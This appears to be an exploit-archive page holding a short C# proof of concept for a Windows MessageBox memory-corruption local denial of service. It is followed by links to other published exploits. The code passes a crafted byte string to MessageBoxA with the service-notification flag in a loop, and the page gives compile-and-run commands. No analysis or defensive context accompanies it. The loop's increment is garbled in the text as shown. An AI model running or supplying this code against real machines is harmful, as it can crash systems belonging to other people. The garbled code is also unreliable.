// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType); static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i<10; i )
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
}
// >> csc /unsafe mbox.cs
// >> mbox.exe//http://www.leftworld.net
【MS Windows (MessageBox) Memory Corruption Local Denial of Service】相关文章:
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ WS_FTP Home/Professional FTP Client Remote Format String PoC
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
★ MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability